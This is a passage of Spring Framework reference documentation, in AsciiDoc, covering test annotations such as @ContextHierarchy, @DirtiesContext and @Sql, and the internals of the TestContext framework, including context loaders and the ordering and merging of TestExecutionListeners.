be\nloaded for the test, using the default value of `\"file:src\/main\/webapp\"` for the path to\nthe root of the web application (i.e., the __resource base path__). The resource base\npath is used behind the scenes to create a `MockServletContext` which serves as the\n`ServletContext` for the test's `WebApplicationContext`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n+\n\n* `@ContextHierarchy`\n\n+\n\nA class-level annotation that is used to define a hierarchy of ++ApplicationContext++s\nfor integration tests. `@ContextHierarchy` should be declared with a list of one or more\n`@ContextConfiguration` instances, each of which defines a level in the context\nhierarchy. The following examples demonstrate the use of `@ContextHierarchy` within a\nsingle test class; however, `@ContextHierarchy` can also be used within a test class\nhierarchy.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n* `@ActiveProfiles`\n\n+\n\nA class-level annotation that is used to declare which __bean definition profiles__\nshould be active when loading an `ApplicationContext` for test classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\n+\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n* `@TestPropertySource`\n\n+\n\nA class-level annotation that is used to configure the locations of properties files and\ninlined properties to be added to the set of `PropertySources` in the `Environment` for\nan `ApplicationContext` loaded for an integration test.\n\n+ \n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\n+\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@DirtiesContext`\n\n+\n\nIndicates that the underlying Spring `ApplicationContext` has been __dirtied__ during\nthe execution of a test (i.e., modified or corrupted in some manner -- for example, by\nchanging the state of a singleton bean) and should be closed. When an application\ncontext is marked __dirty__, it is removed from the testing framework's cache and\nclosed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n+\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\n+\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n+\n\n** Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n** After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n** Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n** After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\n+\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n++ApplicationContext++s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\n+\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n* `@TestExecutionListeners`\n\n+\n\nDefines class-level metadata for configuring which ++TestExecutionListener++s should be\nregistered with the `TestContextManager`. Typically, `@TestExecutionListeners` is used\nin conjunction with `@ContextConfiguration`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@TestExecutionListeners` supports __inherited__ listeners by default. See the javadocs\nfor an example and further details.\n\n+\n\n* `@Commit`\n\n+\n\nIndicates that the transaction for a transactional test method should be __committed__\nafter the test method has completed. `@Commit` can be used as a direct replacement for\n`@Rollback(false)` in order to more explicitly convey the intent of the code. Analogous to\n`@Rollback`, `@Commit` may also be declared as a class-level or method-level annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@Rollback`\n\n+\n\nIndicates whether the transaction for a transactional test method should be __rolled\nback__ after the test method has completed. If `true`, the transaction is rolled back;\notherwise, the transaction is committed (see also `@Commit`). Rollback semantics for\nintegration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\n+\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n* `@BeforeTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __before__ a\ntransaction is started for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n* `@AfterTransaction`\n\n+\n\nIndicates that the annotated `void` method should be executed __after__ a\ntransaction has ended for test methods configured to run within a transaction via the\n`@Transactional` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n* `@Sql`\n\n+\n\nUsed to annotate a test class or test method to configure SQL scripts to be executed\nagainst a given database during integration tests.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\n+\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n* `@SqlConfig`\n\n+\n\nDefines metadata that is used to determine how to parse and execute SQL scripts\nconfigured via the `@Sql` annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n* `@SqlGroup`\n\n+\n\nA container annotation that aggregates several `@Sql` annotations. Can be used natively,\ndeclaring several nested `@Sql` annotations. Can also be used in conjunction with Java\n8's support for repeatable annotations, where `@Sql` can simply be declared several times\non the same class or method, implicitly generating this container annotation.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit's `@Before`), and that will apply for every test method in the test\nclass. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit]]\n==== Spring JUnit Testing Annotations\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\nrules>>, or <<testcontext-support-classes-junit4,Spring's JUnit support classes>>.\n\n* `@IfProfileValue`\n\n+\n\nIndicates that the annotated test is enabled for a specific testing environment. If the\nconfigured `ProfileValueSource` returns a matching `value` for the provided `name`, the\ntest is enabled. Otherwise, the test will be disabled and effectively _ignored_.\n\n+\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. This is analogous to the\nsemantics of JUnit's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\n+\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit environment.\nConsider the following example:\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n+\n\n* `@ProfileValueSourceConfiguration`\n\n+\n\nClass-level annotation that specifies what type of `ProfileValueSource` to use when\nretrieving __profile values__ configured through the `@IfProfileValue` annotation. If\n`@ProfileValueSourceConfiguration` is not declared for a test,\n`SystemProfileValueSource` is used by default.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n* `@Timed`\n\n+\n\nIndicates that the annotated test method must finish execution in a specified time\nperiod (in milliseconds). If the text execution time exceeds the specified time period,\nthe test fails.\n\n+\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\n+\n\nSpring's `@Timed` annotation has different semantics than JUnit's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n* `@Repeat`\n\n+\n\nIndicates that the annotated test method must be executed repeatedly. The number of\ntimes that the test method is to be executed is specified in the annotation.\n\n+\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nAs of Spring Framework 4.0, it is possible to use test-related annotations as\n<<beans-meta-annotations,meta-annotations>> in order to create custom _composed annotations_\nand reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat`\n* `@Timed`\n* `@IfProfileValue`\n* `@ProfileValueSourceConfiguration`\n\nFor example, if we discover that we are repeating the following configuration\nacross our JUnit-based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTest { }\n----\n\nThen we can use our custom `@TransactionalDevTest` annotation to simplify the\nconfiguration of individual test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTest\n\tpublic class UserRepositoryTests { }\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[testcontext-framework]]\n=== Spring TestContext Framework\nThe __Spring TestContext Framework__ (located in the\n`org.springframework.test.context` package) provides generic, annotation-driven unit and\nintegration testing support that is agnostic of the testing framework in use. The\nTestContext framework also places a great deal of importance on __convention over\nconfiguration__ with reasonable defaults that can be overridden through annotation-based\nconfiguration.\n\nIn addition to generic testing infrastructure, the TestContext framework provides\nexplicit support for JUnit and TestNG in the form of `abstract` support classes. For\nJUnit, Spring also provides a custom JUnit `Runner` and custom JUnit `Rules` that allow\none to write so-called __POJO test classes__. POJO test classes are not required to\nextend a particular class hierarchy.\n\nThe following section provides an overview of the internals of the TestContext\nframework. If you are only interested in using the framework and not necessarily\ninterested in extending it with your own custom listeners or custom loaders, feel free\nto go directly to the configuration (<<testcontext-ctx-management,context management>>,\n<<testcontext-fixture-di,dependency injection>>, <<testcontext-tx,transaction\nmanagement>>), <<testcontext-support-classes,support classes>>, and\n<<integration-testing-annotations,annotation support>> sections.\n\n\n[[testcontext-key-abstractions]]\n==== Key abstractions\nThe core of the framework consists of the `TestContext` and `TestContextManager` classes\nand the `TestExecutionListener`, `ContextLoader`, and `SmartContextLoader` interfaces. A\n`TestContextManager` is created on a per-test basis (e.g., for the execution of a single\ntest method in JUnit). The `TestContextManager` in turn manages a `TestContext` that\nholds the context of the current test. The `TestContextManager` also updates the state\nof the `TestContext` as the test progresses and delegates to ++TestExecutionListener++s,\nwhich instrument the actual test execution by providing dependency injection, managing\ntransactions, and so on. A `ContextLoader` (or `SmartContextLoader`) is responsible for\nloading an `ApplicationContext` for a given test class. Consult the javadocs and the\nSpring test suite for further information and examples of various implementations.\n\n* `TestContext`: Encapsulates the context in which a test is executed, agnostic of the\n actual testing framework in use, and provides context management and caching support\n for the test instance for which it is responsible. The `TestContext` also delegates to\n a `ContextLoader` (or `SmartContextLoader`) to load an `ApplicationContext` if\n requested.\n* `TestContextManager`: The main entry point into the __Spring TestContext Framework__,\n which manages a single `TestContext` and signals events to all registered\n ++TestExecutionListener++s at well-defined test execution points:\n** prior to any __before class methods__ of a particular testing framework\n** test instance preparation\n** prior to any __before methods__ of a particular testing framework\n** after any __after methods__ of a particular testing framework\n** after any __after class methods__ of a particular testing framework\n* `TestExecutionListener`: Defines a __listener__ API for reacting to test execution\n events published by the `TestContextManager` with which the listener is registered. See\n <<testcontext-tel-config>>.\n* `ContextLoader`: Strategy interface introduced in Spring 2.5 for loading an\n `ApplicationContext` for an integration test managed by the Spring TestContext\n Framework.\n\n+\n\nImplement `SmartContextLoader` instead of this interface in order to provide support for\nannotated classes, active bean definition profiles, test property sources, context\nhierarchies, and ++WebApplicationContext++s.\n\n* `SmartContextLoader`: Extension of the `ContextLoader` interface introduced in Spring\n 3.1.\n\n+\n\nThe `SmartContextLoader` SPI supersedes the `ContextLoader` SPI that was introduced in\nSpring 2.5. Specifically, a `SmartContextLoader` can choose to process resource\n`locations`, annotated `classes`, or context `initializers`. Furthermore, a\n`SmartContextLoader` can set active bean definition profiles and test property sources in\nthe context that it loads.\n\n+\n\nSpring provides the following implementations:\n\n+\n\n** `DelegatingSmartContextLoader`: one of two default loaders which delegates internally\nto an `AnnotationConfigContextLoader`, a `GenericXmlContextLoader`, or a\n`GenericGroovyXmlContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes.\nGroovy support is only enabled if Groovy is on the classpath.\n** `WebDelegatingSmartContextLoader`: one of two default loaders which delegates\ninternally to an `AnnotationConfigWebContextLoader`, a `GenericXmlWebContextLoader`, or a\n`GenericGroovyXmlWebContextLoader` depending either on the configuration declared for the\ntest class or on the presence of default locations or default configuration classes. A\nweb `ContextLoader` will only be used if `@WebAppConfiguration` is present on the test\nclass. Groovy support is only enabled if Groovy is on the classpath.\n** `AnnotationConfigContextLoader`: loads a standard `ApplicationContext` from\n__annotated classes__.\n** `AnnotationConfigWebContextLoader`: loads a `WebApplicationContext` from __annotated\nclasses__.\n** `GenericGroovyXmlContextLoader`: loads a standard `ApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericGroovyXmlWebContextLoader`: loads a `WebApplicationContext` from __resource\nlocations__ that are either Groovy scripts or XML configuration files.\n** `GenericXmlContextLoader`: loads a standard `ApplicationContext` from XML __resource\nlocations__.\n** `GenericXmlWebContextLoader`: loads a `WebApplicationContext` from XML __resource\nlocations__.\n** `GenericPropertiesContextLoader`: loads a standard `ApplicationContext` from Java\nProperties files.\n\nThe following sections explain how to configure the TestContext framework through\nannotations and provide working examples of how to write unit and integration tests with\nthe framework.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ++TestExecutionListener++s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ++TestExecutionListener++s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. To address this\nissue, Spring Framework 4.1 supports automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n++TestExecutionListener++s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. Third-party frameworks and developers can\ncontribute their own ++TestExecutionListener++s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ++TestExecutionListener++s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n++TestExecutionListener++s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ++TestExecutionListener++s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ++TestExecutionListener++s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1. Furthermore, third-party frameworks like Spring\nSecurity register their own default ++TestExecutionListener++s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For 